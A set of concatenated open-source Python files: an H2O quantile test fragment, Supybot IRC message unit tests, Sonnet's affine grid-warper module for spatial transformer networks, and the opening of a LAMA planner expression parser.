h2o_util.assertApproxEqual(pctile[5], expected[3], tol=maxErr, msg='50th percentile (median) is not approx. expected')
if expected[4]:
h2o_util.assertApproxEqual(pctile[7], expected[4], tol=maxErr, msg='75th percentile is not approx. expected')
if expected[5]:
h2o_util.assertApproxEqual(maxs[0], expected[5], tol=maxErr, msg='max is not approx. expected')
hstart = column['hstart']
hstep = column['hstep']
hbrk = column['hbrk']
hcnt = column['hcnt']
for b in hcnt:
# should we be able to check for a uniform distribution in the files?
e = .1 * numRows
# self.assertAlmostEqual(b, .1 * rowCount, delta=.01*rowCount,
# msg="Bins not right. b: %s e: %s" % (b, e))
if stattype!='Enum':
pt = h2o_util.twoDecimals(pctile)
print "colname:", colname, "pctile (2 places):", pt
mx = h2o_util.twoDecimals(maxs)
mn = h2o_util.twoDecimals(mins)
print "colname:", colname, "maxs: (2 places):", mx
print "colname:", colname, "mins: (2 places):", mn
# FIX! we should do an exec and compare using the exec quantile too
actual = mn[0], pt[3], pt[5], pt[7], mx[0]
print "min/25/50/75/max colname:", colname, "(2 places):", actual
print "maxs colname:", colname, "(2 places):", mx
print "mins colname:", colname, "(2 places):", mn
# don't check if colname is empty..means it's a string and scipy doesn't parse right?
# need to ignore the car names
if colname!='' and expected[scipyCol]:
# don't do for enums
# also get the median with a sort (h2o_summ.percentileOnSortedlist()
h2o_summ.quantile_comparisons(
csvPathnameFull,
skipHeader=True,
col=scipyCol,
datatype='float',
quantile=0.5 if DO_MEDIAN else 0.999,
# FIX! ignore for now
h2oSummary2=pctile[5 if DO_MEDIAN else 10],
h2oQuantilesApprox=qresult_single,
h2oQuantilesExact=qresult,
h2oSummary2MaxErr=maxErr,
)
if False and h2o_util.approxEqual(pctile[5], 0.990238116744, tol=0.002, msg='stop here'):
raise Exception("stopping to look")
scipyCol += 1
trial += 1
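# A hedged sketch of the max-error reasoning used in the test above (the
# helper name is ours, not part of the original suite): with qbins quantile
# bins over the expected range, and up to 2 bins lost to floor/ceil effects,
# the worst-case quantile error is half of one bin width.
def expected_max_err(lo, hi, qbins=MAX_QBINS):
    expectedRange = hi - lo
    expectedBin = expectedRange / (qbins - 2)
    return 0.5 * expectedBin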
if __name__ == '__main__':
h2o.unit_main()
| rowhit/h2o-2 | py/testdir_single_jvm/test_summary2_unifiles.py | Python | apache-2.0 | 10,223 |
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
import copy
import pickle
import supybot.ircmsgs as ircmsgs
import supybot.ircutils as ircutils
# The test framework used to provide these, but now it doesn't. We'll add
# messages to these lists as we find bugs (if indeed we find bugs).
msgs = []
rawmsgs = []
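# Illustrative only: the raw message below is an assumption, not a recorded
# bug case; it shows the shape of entries these lists expect.
rawmsgs.append(':nick!user@host PRIVMSG #channel :hello')
msgs.append(ircmsgs.IrcMsg(rawmsgs[-1]))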
class IrcMsgTestCase(SupyTestCase):
def testLen(self):
for msg in msgs:
if msg.prefix:
strmsg = str(msg)
self.failIf(len(msg) != len(strmsg) and \
strmsg.replace(':', '') == strmsg)
def testRepr(self):
IrcMsg = ircmsgs.IrcMsg
for msg in msgs:
self.assertEqual(msg, eval(repr(msg)))
def testStr(self):
for (rawmsg, msg) in zip(rawmsgs, msgs):
strmsg = str(msg).strip()
self.failIf(rawmsg != strmsg and \
strmsg.replace(':', '') == strmsg)
def testEq(self):
for msg in msgs:
self.assertEqual(msg, msg)
self.failIf(msgs and msgs[0] == []) # Comparison to unhashable type.
def testNe(self):
for msg in msgs:
self.failIf(msg != msg)
## def testImmutability(self):
## s = 'something else'
## t = ('foo', 'bar', 'baz')
## for msg in msgs:
## self.assertRaises(AttributeError, setattr, msg, 'prefix', s)
## self.assertRaises(AttributeError, setattr, msg, 'nick', s)
## self.assertRaises(AttributeError, setattr, msg, 'user', s)
## self.assertRaises(AttributeError, setattr, msg, 'host', s)
## self.assertRaises(AttributeError, setattr, msg, 'command', s)
## self.assertRaises(AttributeError, setattr, msg, 'args', t)
## if msg.args:
## def setArgs(msg):
## msg.args[0] = s
## self.assertRaises(TypeError, setArgs, msg)
def testInit(self):
for msg in msgs:
self.assertEqual(msg, ircmsgs.IrcMsg(prefix=msg.prefix,
command=msg.command,
args=msg.args))
self.assertEqual(msg, ircmsgs.IrcMsg(msg=msg))
self.assertRaises(ValueError,
ircmsgs.IrcMsg,
args=('foo', 'bar'),
prefix='foo!bar@baz')
def testPickleCopy(self):
for msg in msgs:
self.assertEqual(msg, pickle.loads(pickle.dumps(msg)))
self.assertEqual(msg, copy.copy(msg))
def testHashNotZero(self):
zeroes = 0
for msg in msgs:
if hash(msg) == 0:
zeroes += 1
self.failIf(zeroes > (len(msgs)/10), 'Too many zero hashes.')
def testMsgKeywordHandledProperly(self):
msg = ircmsgs.notice('foo', 'bar')
msg2 = ircmsgs.IrcMsg(msg=msg, command='PRIVMSG')
self.assertEqual(msg2.command, 'PRIVMSG')
self.assertEqual(msg2.args, msg.args)
def testMalformedIrcMsgRaised(self):
self.assertRaises(ircmsgs.MalformedIrcMsg, ircmsgs.IrcMsg, ':foo')
self.assertRaises(ircmsgs.MalformedIrcMsg, ircmsgs.IrcMsg,
args=('biff',), prefix='foo!bar@baz')
def testTags(self):
m = ircmsgs.privmsg('foo', 'bar')
self.failIf(m.repliedTo)
m.tag('repliedTo')
self.failUnless(m.repliedTo)
m.tag('repliedTo')
self.failUnless(m.repliedTo)
m.tag('repliedTo', 12)
self.assertEqual(m.repliedTo, 12)
class FunctionsTestCase(SupyTestCase):
def testIsAction(self):
        L = [':[email protected] PRIVMSG'
             ' #sourcereview :\x01ACTION does something\x01',
             ':[email protected] PRIVMSG #sourcereview '
             ':\x01ACTION beats angryman senseless with a Unix manual (#2)\x01',
             ':[email protected] PRIVMSG #sourcereview '
             ':\x01ACTION beats ang senseless with a 50lb Unix manual (#2)\x01',
             ':[email protected] PRIVMSG #sourcereview '
             ':\x01ACTION resizes angryman\'s terminal to 40x24 (#16)\x01']
msgs = map(ircmsgs.IrcMsg, L)
for msg in msgs:
self.failUnless(ircmsgs.isAction(msg))
def testIsActionIsntStupid(self):
m = ircmsgs.privmsg('#x', '\x01NOTANACTION foo\x01')
self.failIf(ircmsgs.isAction(m))
m = ircmsgs.privmsg('#x', '\x01ACTION foo bar\x01')
self.failUnless(ircmsgs.isAction(m))
def testIsCtcp(self):
self.failUnless(ircmsgs.isCtcp(ircmsgs.privmsg('foo',
'\x01VERSION\x01')))
self.failIf(ircmsgs.isCtcp(ircmsgs.privmsg('foo', '\x01')))
def testIsActionFalseWhenNoSpaces(self):
msg = ircmsgs.IrcMsg('PRIVMSG #foo :\x01ACTIONfoobar\x01')
self.failIf(ircmsgs.isAction(msg))
def testUnAction(self):
s = 'foo bar baz'
msg = ircmsgs.action('#foo', s)
self.assertEqual(ircmsgs.unAction(msg), s)
def testBan(self):
channel = '#osu'
ban = '*!*@*.edu'
exception = '*!*@*ohio-state.edu'
noException = ircmsgs.ban(channel, ban)
self.assertEqual(ircutils.separateModes(noException.args[1:]),
[('+b', ban)])
withException = ircmsgs.ban(channel, ban, exception)
self.assertEqual(ircutils.separateModes(withException.args[1:]),
[('+b', ban), ('+e', exception)])
def testBans(self):
channel = '#osu'
bans = ['*!*@*', 'jemfinch!*@*']
exceptions = ['*!*@*ohio-state.edu']
noException = ircmsgs.bans(channel, bans)
self.assertEqual(ircutils.separateModes(noException.args[1:]),
[('+b', bans[0]), ('+b', bans[1])])
withExceptions = ircmsgs.bans(channel, bans, exceptions)
self.assertEqual(ircutils.separateModes(withExceptions.args[1:]),
[('+b', bans[0]), ('+b', bans[1]),
('+e', exceptions[0])])
def testUnban(self):
channel = '#supybot'
ban = 'foo!bar@baz'
self.assertEqual(str(ircmsgs.unban(channel, ban)),
'MODE %s -b :%s\r\n' % (channel, ban))
def testJoin(self):
channel = '#osu'
key = 'michiganSucks'
self.assertEqual(ircmsgs.join(channel).args, ('#osu',))
self.assertEqual(ircmsgs.join(channel, key).args,
('#osu', 'michiganSucks'))
def testJoins(self):
channels = ['#osu', '#umich']
keys = ['michiganSucks', 'osuSucks']
self.assertEqual(ircmsgs.joins(channels).args, ('#osu,#umich',))
self.assertEqual(ircmsgs.joins(channels, keys).args,
('#osu,#umich', 'michiganSucks,osuSucks'))
keys.pop()
self.assertEqual(ircmsgs.joins(channels, keys).args,
('#osu,#umich', 'michiganSucks'))
def testQuit(self):
self.failUnless(ircmsgs.quit(prefix='foo!bar@baz'))
def testOps(self):
m = ircmsgs.ops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo +ooo foo bar :baz\r\n')
def testDeops(self):
m = ircmsgs.deops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo -ooo foo bar :baz\r\n')
def testVoices(self):
m = ircmsgs.voices('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo +vvv foo bar :baz\r\n')
def testDevoices(self):
m = ircmsgs.devoices('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo -vvv foo bar :baz\r\n')
def testHalfops(self):
m = ircmsgs.halfops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo +hhh foo bar :baz\r\n')
def testDehalfops(self):
m = ircmsgs.dehalfops('#foo', ['foo', 'bar', 'baz'])
self.assertEqual(str(m), 'MODE #foo -hhh foo bar :baz\r\n')
def testMode(self):
m = ircmsgs.mode('#foo', ('-b', 'foo!bar@baz'))
s = str(m)
self.assertEqual(s, 'MODE #foo -b :foo!bar@baz\r\n')
def testIsSplit(self):
m = ircmsgs.IrcMsg(prefix="[email protected]",
command="QUIT",
args=('jupiter.oftc.net quasar.oftc.net',))
self.failUnless(ircmsgs.isSplit(m))
m = ircmsgs.IrcMsg(prefix="[email protected]",
command="QUIT",
args=('Read error: 110 (Connection timed out)',))
self.failIf(ircmsgs.isSplit(m))
m = ircmsgs.IrcMsg(prefix="[email protected]",
command="QUIT",
args=('"Bye!"',))
self.failIf(ircmsgs.isSplit(m))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| buildbot/supybot | test/test_ircmsgs.py | Python | bsd-3-clause | 10,535 |
# Copyright 2017 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""""Implementation of Spatial Transformer networks core components."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from itertools import chain
# Dependency imports
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from sonnet.python.modules import base
from sonnet.python.modules import basic
import tensorflow as tf
class GridWarper(base.AbstractModule):
"""Grid warper interface class.
An object implementing the `GridWarper` interface generates a reference grid
of feature points at construction time, and warps it via a parametric
transformation model, specified at run time by an input parameter Tensor.
Grid warpers must then implement a `create_features` function used to generate
the reference grid to be warped in the forward pass (according to a determined
warping model).
"""
def __init__(self, source_shape, output_shape, num_coeff, name, **kwargs):
"""Constructs a GridWarper module and initializes the source grid params.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
num_coeff: Number of coefficients parametrizing the grid warp.
For example, a 2D affine transformation will be defined by the 6
parameters populating the corresponding 2x3 affine matrix.
name: Name of Module.
**kwargs: Extra kwargs to be forwarded to the `create_features` function,
instantiating the source grid parameters.
Raises:
Error: If `len(output_shape) > len(source_shape)`.
TypeError: If `output_shape` and `source_shape` are not both iterable.
"""
super(GridWarper, self).__init__(name=name)
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)
if len(self._output_shape) > len(self._source_shape):
raise base.Error('Output domain dimensionality ({}) must be equal or '
'smaller than source domain dimensionality ({})'
.format(len(self._output_shape),
len(self._source_shape)))
self._num_coeff = num_coeff
self._psi = self._create_features(**kwargs)
@abc.abstractmethod
def _create_features(self, **kwargs):
"""Generates matrix of features, of size `[num_coeff, num_points]`."""
pass
@property
def n_coeff(self):
"""Returns number of coefficients of warping function."""
    return self._num_coeff
@property
def psi(self):
"""Returns a list of features used to compute the grid warp."""
return self._psi
@property
def source_shape(self):
"""Returns a tuple containing the shape of the source signal."""
return self._source_shape
@property
def output_shape(self):
"""Returns a tuple containing the shape of the output grid."""
return self._output_shape
def _create_affine_features(output_shape, source_shape):
"""Generates n-dimensional homogenous coordinates for a given grid definition.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
output_shape: Iterable of integers determining the shape of the grid to be
warped.
source_shape: Iterable of integers determining the domain of the signal to be
resampled.
Returns:
List of flattened numpy arrays of coordinates in range `[-1, 1]^N`, for
example:
```
[[x_0_0, .... , x_0_{n-1}],
....
[x_{M-1}_0, .... , x_{M-1}_{n-1}],
[x_{M}_0=0, .... , x_{M}_{n-1}=0],
...
[x_{N-1}_0=0, .... , x_{N-1}_{n-1}=0],
[1, ..., 1]]
```
where N is the dimensionality of the sampled space, M is the
dimensionality of the output space, i.e. 2 for images
and 3 for volumes, and n is the number of points in the output grid.
  When the dimensionality of `output_shape` is smaller than that of
`source_shape` the last rows before [1, ..., 1] will be filled with 0.
"""
ranges = [np.linspace(-1, 1, x, dtype=np.float32)
for x in reversed(output_shape)]
psi = [x.reshape(-1) for x in np.meshgrid(*ranges, indexing='xy')]
dim_gap = len(source_shape) - len(output_shape)
for _ in xrange(dim_gap):
psi.append(np.zeros_like(psi[0], dtype=np.float32))
psi.append(np.ones_like(psi[0], dtype=np.float32))
return psi
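# Worked example (by hand, from the code above):
# _create_affine_features(output_shape=(2, 2), source_shape=(2, 2)) returns
# three flat arrays: x coords [-1, 1, -1, 1], y coords [-1, -1, 1, 1], and
# the homogeneous row [1, 1, 1, 1].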
class AffineGridWarper(GridWarper):
"""Affine Grid Warper class.
The affine grid warper generates a reference grid of n-dimensional points
  and warps it via an affine transformation model determined by an input
parameter Tensor. Some of the transformation parameters can be fixed at
construction time via an `AffineWarpConstraints` object.
"""
def __init__(self,
source_shape,
output_shape,
constraints=None,
name='affine_grid_warper'):
"""Constructs an AffineGridWarper.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
constraints: Either a double list of shape `[N, N+1]` defining constraints
on the entries of a matrix defining an affine transformation in N
dimensions, or an `AffineWarpConstraints` object. If the double list is
passed, a numeric value bakes in a constraint on the corresponding
        entry in the transformation matrix, whereas `None` implies that the
corresponding entry will be specified at run time.
name: Name of module.
Raises:
Error: If constraints fully define the affine transformation; or if
      input grid shape and constraints have different dimensionality.
TypeError: If output_shape and source_shape are not both iterable.
"""
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)
num_dim = len(source_shape)
if isinstance(constraints, AffineWarpConstraints):
self._constraints = constraints
elif constraints is None:
self._constraints = AffineWarpConstraints.no_constraints(num_dim)
else:
self._constraints = AffineWarpConstraints(constraints=constraints)
if self._constraints.num_free_params == 0:
raise base.Error('Transformation is fully constrained.')
if self._constraints.num_dim != num_dim:
raise base.Error('Incompatible set of constraints provided: '
'input grid shape and constraints have different '
'dimensionality.')
super(AffineGridWarper, self).__init__(source_shape=source_shape,
output_shape=output_shape,
num_coeff=6,
name=name,
constraints=self._constraints)
def _create_features(self, constraints):
"""Creates all the matrices needed to compute the output warped grids."""
affine_warp_constraints = constraints
if not isinstance(affine_warp_constraints, AffineWarpConstraints):
affine_warp_constraints = AffineWarpConstraints(affine_warp_constraints)
mask = affine_warp_constraints.mask
psi = _create_affine_features(output_shape=self._output_shape,
source_shape=self._source_shape)
scales = [(x - 1.0) * .5 for x in reversed(self._source_shape)]
offsets = scales
# Transforming a point x's i-th coordinate via an affine transformation
# is performed via the following dot product:
#
# x_i' = s_i * (T_i * x) + t_i (1)
#
# where Ti is the i-th row of an affine matrix, and the scalars s_i and t_i
# define a decentering and global scaling into the source space.
# In the AffineGridWarper some of the entries of Ti are provided via the
# input, some others are instead fixed, according to the constraints
# assigned in the constructor.
# In create_features the internal dot product (1) is accordingly broken down
# into two parts:
#
# x_i' = Ti[uncon_i] * x[uncon_i, :] + offset(con_var) (2)
#
# i.e. the sum of the dot product of the free parameters (coming
    # from the input) indexed by uncon_i and an offset obtained by
# precomputing the fixed part of (1) according to the constraints.
# This step is implemented by analyzing row by row the constraints matrix
# and saving into a list the x[uncon_i] and offset(con_var) data matrices
# for each output dimension.
features = []
for row, scale in zip(mask, scales):
x_i = np.array([x for x, is_active in zip(psi, row) if is_active])
features.append(x_i * scale if len(x_i) else None)
for row_i, row in enumerate(mask):
x_i = None
s = scales[row_i]
for i, is_active in enumerate(row):
if is_active:
continue
# In principle a whole row of the affine matrix can be fully
# constrained. In that case the corresponding dot product between input
# parameters and grid coordinates doesn't need to be implemented in the
# computation graph since it can be precomputed.
        # When a whole row is constrained, x_i - which is initialized to
        # None - will still be None at the end of the loop when it is appended
# to the features list; this value is then used to detect this setup
# in the build function where the graph is assembled.
if x_i is None:
x_i = np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
else:
x_i += np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
features.append(x_i)
features += offsets
return features
def _build(self, inputs):
"""Assembles the module network and adds it to the graph.
The internal computation graph is assembled according to the set of
constraints provided at construction time.
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A batch of warped grids.
Raises:
Error: If the input tensor size is not consistent with the constraints
passed at construction time.
"""
input_shape = tf.shape(inputs)
input_dtype = inputs.dtype.as_numpy_dtype
batch_size = tf.expand_dims(input_shape[0], 0)
number_of_params = inputs.get_shape()[1]
if number_of_params != self._constraints.num_free_params:
raise base.Error('Input size is not consistent with constraint '
'definition: {} parameters expected, {} provided.'
.format(self._constraints.num_free_params,
number_of_params))
num_output_dimensions = len(self._psi) // 3
def get_input_slice(start, size):
"""Extracts a subset of columns from the input 2D Tensor."""
return basic.SliceByDim([1], [start], [size])(inputs)
warped_grid = []
var_index_offset = 0
number_of_points = np.prod(self._output_shape)
for i in xrange(num_output_dimensions):
if self._psi[i] is not None:
# The i-th output dimension is not fully specified by the constraints,
# the graph is setup to perform matrix multiplication in batch mode.
grid_coord = self._psi[i].astype(input_dtype)
num_active_vars = self._psi[i].shape[0]
active_vars = get_input_slice(var_index_offset, num_active_vars)
warped_coord = tf.matmul(active_vars, grid_coord)
warped_coord = tf.expand_dims(warped_coord, 1)
var_index_offset += num_active_vars
offset = self._psi[num_output_dimensions + i]
if offset is not None:
offset = offset.astype(input_dtype)
# Some entries in the i-th row of the affine matrix were constrained
# and the corresponding matrix multiplications have been precomputed.
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(offset.shape)
],
0)
offset = offset.reshape((1, 1) + offset.shape)
warped_coord += tf.tile(offset, tiling_params)
else:
# The i-th output dimension is fully specified by the constraints, and
# the corresponding matrix multiplications have been precomputed.
warped_coord = self._psi[num_output_dimensions + i].astype(input_dtype)
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(warped_coord.shape)
],
0)
warped_coord = warped_coord.reshape((1, 1) + warped_coord.shape)
warped_coord = tf.tile(warped_coord, tiling_params)
warped_coord += self._psi[i + 2 * num_output_dimensions]
# Need to help TF figuring out shape inference since tiling information
# is held in Tensors which are not known until run time.
warped_coord.set_shape([None, 1, number_of_points])
warped_grid.append(warped_coord)
# Reshape all the warped coordinates tensors to match the specified output
# shape and concatenate into a single matrix.
grid_shape = self._output_shape + (1,)
warped_grid = [basic.BatchReshape(grid_shape)(grid) for grid in warped_grid]
return tf.concat(warped_grid, len(grid_shape))
@property
def constraints(self):
return self._constraints
def inverse(self, name=None):
"""Returns a `sonnet` module to compute inverse affine transforms.
The function first assembles a network that given the constraints of the
current AffineGridWarper and a set of input parameters, retrieves the
coefficients of the corresponding inverse affine transform, then feeds its
output into a new AffineGridWarper setup to correctly warp the `output`
space into the `source` space.
Args:
name: Name of module implementing the inverse grid transformation.
Returns:
A `sonnet` module performing the inverse affine transform of a reference
grid of points via an AffineGridWarper module.
Raises:
tf.errors.UnimplementedError: If the function is called on a non 2D
instance of AffineGridWarper.
"""
if self._num_coeff != 6:
      raise tf.errors.UnimplementedError('AffineGridWarper currently supports '
'inversion only for the 2D case.')
def _affine_grid_warper_inverse(inputs):
"""Assembles network to compute inverse affine transformation.
      Each `inputs` row potentially contains [a, b, tx, c, d, ty]
corresponding to an affine matrix:
A = [a, b, tx],
[c, d, ty]
We want to generate a tensor containing the coefficients of the
corresponding inverse affine transformation in a constraints-aware
fashion.
Calling M:
M = [a, b]
[c, d]
the affine matrix for the inverse transform is:
        A_inv = [M^(-1), M^(-1) * [-tx, -ty]^T]
where
M^(-1) = (ad - bc)^(-1) * [ d, -b]
[-c, a]
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A tensorflow graph performing the inverse affine transformation
parametrized by the input coefficients.
"""
batch_size = tf.expand_dims(tf.shape(inputs)[0], 0)
constant_shape = tf.concat([batch_size, tf.convert_to_tensor((1,))], 0)
index = iter(range(6))
def get_variable(constraint):
if constraint is None:
i = next(index)
return inputs[:, i:i+1]
else:
return tf.fill(constant_shape, tf.constant(constraint,
dtype=inputs.dtype))
constraints = chain.from_iterable(self.constraints)
a, b, tx, c, d, ty = (get_variable(constr) for constr in constraints)
det = a * d - b * c
a_inv = d / det
b_inv = -b / det
c_inv = -c / det
d_inv = a / det
m_inv = basic.BatchReshape(
[2, 2])(tf.concat([a_inv, b_inv, c_inv, d_inv], 1))
txy = tf.expand_dims(tf.concat([tx, ty], 1), 2)
txy_inv = basic.BatchFlatten()(tf.matmul(m_inv, txy))
tx_inv = txy_inv[:, 0:1]
ty_inv = txy_inv[:, 1:2]
inverse_gw_inputs = tf.concat(
[a_inv, b_inv, -tx_inv, c_inv, d_inv, -ty_inv], 1)
agw = AffineGridWarper(self.output_shape,
self.source_shape)
return agw(inverse_gw_inputs) # pylint: disable=not-callable
if name is None:
name = self.module_name + '_inverse'
return base.Module(_affine_grid_warper_inverse, name=name)
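# A minimal usage sketch (shapes and parameter values are illustrative, not
# from the original module):
#
#   warper = AffineGridWarper(source_shape=(10, 10), output_shape=(4, 4))
#   params = tf.placeholder(tf.float32, [None, 6])  # one 2x3 affine per row
#   grid = warper(params)  # [batch, 4, 4, 2] coordinates into source space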
class AffineWarpConstraints(object):
"""Affine warp contraints class.
`AffineWarpConstraints` allow for very succinct definitions of constraints on
the values of entries in affine transform matrices.
"""
def __init__(self, constraints=((None,) * 3,) * 2):
"""Creates a constraint definition for an affine transformation.
Args:
constraints: A doubly-nested iterable of shape `[N, N+1]` defining
constraints on the entries of a matrix that represents an affine
transformation in `N` dimensions. A numeric value bakes in a constraint
        on the corresponding entry in the transformation matrix, whereas `None`
implies that the corresponding entry will be specified at run time.
Raises:
TypeError: If `constraints` is not a nested iterable.
ValueError: If the double iterable `constraints` has inconsistent
dimensions.
"""
try:
self._constraints = tuple(tuple(x) for x in constraints)
except TypeError:
raise TypeError('constraints must be a nested iterable.')
# Number of rows
self._num_dim = len(self._constraints)
expected_num_cols = self._num_dim + 1
if any(len(x) != expected_num_cols for x in self._constraints):
      raise ValueError('The input list must define an Nx(N+1) matrix of '
                       'constraints.')
def _calc_mask(self):
"""Computes a boolean mask from the user defined constraints."""
mask = []
for row in self._constraints:
mask.append(tuple(x is None for x in row))
return tuple(mask)
def _calc_num_free_params(self):
"""Computes number of non constrained parameters."""
return sum(row.count(None) for row in self._constraints)
@property
def num_free_params(self):
return self._calc_num_free_params()
@property
def mask(self):
return self._calc_mask()
@property
def constraints(self):
return self._constraints
@property
def num_dim(self):
return self._num_dim
def __getitem__(self, i):
"""Returns the list of constraints for the i-th row of the affine matrix."""
return self._constraints[i]
def _combine(self, x, y):
"""Combines two constraints, raising an error if they are not compatible."""
if x is None or y is None:
return x or y
if x != y:
raise ValueError('Incompatible set of constraints provided.')
return x
def __and__(self, rhs):
"""Combines two sets of constraints into a coherent single set."""
return self.combine_with(rhs)
def combine_with(self, additional_constraints):
"""Combines two sets of constraints into a coherent single set."""
x = additional_constraints
if not isinstance(additional_constraints, AffineWarpConstraints):
x = AffineWarpConstraints(additional_constraints)
new_constraints = []
for left, right in zip(self._constraints, x.constraints):
new_constraints.append([self._combine(x, y) for x, y in zip(left, right)])
return AffineWarpConstraints(new_constraints)
  # Collection of utilities to initialize an AffineGridWarper in 2D and 3D.
@classmethod
def no_constraints(cls, num_dim=2):
"""Empty set of constraints for a num_dim-ensional affine transform."""
return cls(((None,) * (num_dim + 1),) * num_dim)
@classmethod
def translation_2d(cls, x=None, y=None):
"""Assign contraints on translation components of affine transform in 2d."""
return cls([[None, None, x],
[None, None, y]])
@classmethod
def translation_3d(cls, x=None, y=None, z=None):
"""Assign contraints on translation components of affine transform in 3d."""
return cls([[None, None, None, x],
[None, None, None, y],
[None, None, None, z]])
@classmethod
def scale_2d(cls, x=None, y=None):
"""Assigns contraints on scaling components of affine transform in 2d."""
return cls([[x, None, None],
[None, y, None]])
@classmethod
def scale_3d(cls, x=None, y=None, z=None):
"""Assigns contraints on scaling components of affine transform in 3d."""
return cls([[x, None, None, None],
[None, y, None, None],
[None, None, z, None]])
@classmethod
def shear_2d(cls, x=None, y=None):
"""Assigns contraints on shear components of affine transform in 2d."""
return cls([[None, x, None],
[y, None, None]])
@classmethod
def no_shear_2d(cls):
return cls.shear_2d(x=0, y=0)
@classmethod
def no_shear_3d(cls):
"""Assigns contraints on shear components of affine transform in 3d."""
return cls([[None, 0, 0, None],
[0, None, 0, None],
[0, 0, None, None]])
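# Example (illustrative): constraint sets compose with `&`, so a 2D warp with
# no shear and unit scale leaves only the two translation entries free:
#
#   c = (AffineWarpConstraints.no_shear_2d() &
#        AffineWarpConstraints.scale_2d(x=1, y=1))
#   assert c.num_free_params == 2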
| mumuwoyou/vnpy-master | sonnet/python/modules/spatial_transformer.py | Python | mit | 23,304 |
#######################################################################
#
# Author: Gabi Roeger
# Modified by: Silvia Richter ([email protected])
# (C) Copyright 2008: Gabi Roeger and NICTA
#
# This file is part of LAMA.
#
# LAMA is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the license, or (at your option) any later version.
#
# LAMA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
#######################################################################
import string
import conditions
def parse_expression(exp):
if isinstance(exp, list):
functionsymbol = exp[0]
return PrimitiveNumericExpression(functionsymbol,
[conditions.parse_term(arg) for arg in exp[1:]])
elif exp.replace(".","").isdigit():
return NumericConstant(string.atof(exp))
else:
return PrimitiveNumericExpression(exp,[])
def parse_assignment(alist):
assert len(alist) == 3
op = alist[0]
head = parse_expression(alist[1])
exp = parse_expression(alist[2])
if op == "=":
return Assign(head, exp)
elif op == "increase":
return Increase(head, exp)
else:
assert False, "Assignment operator not supported."
class FunctionalExpression(object):
def __init__(self, parts):
self.parts = tuple(parts)
def dump(self, indent=" "):
print "%s%s" % (indent, self._dump())
for part in self.parts:
part.dump(indent + " ")
def _dump(self):
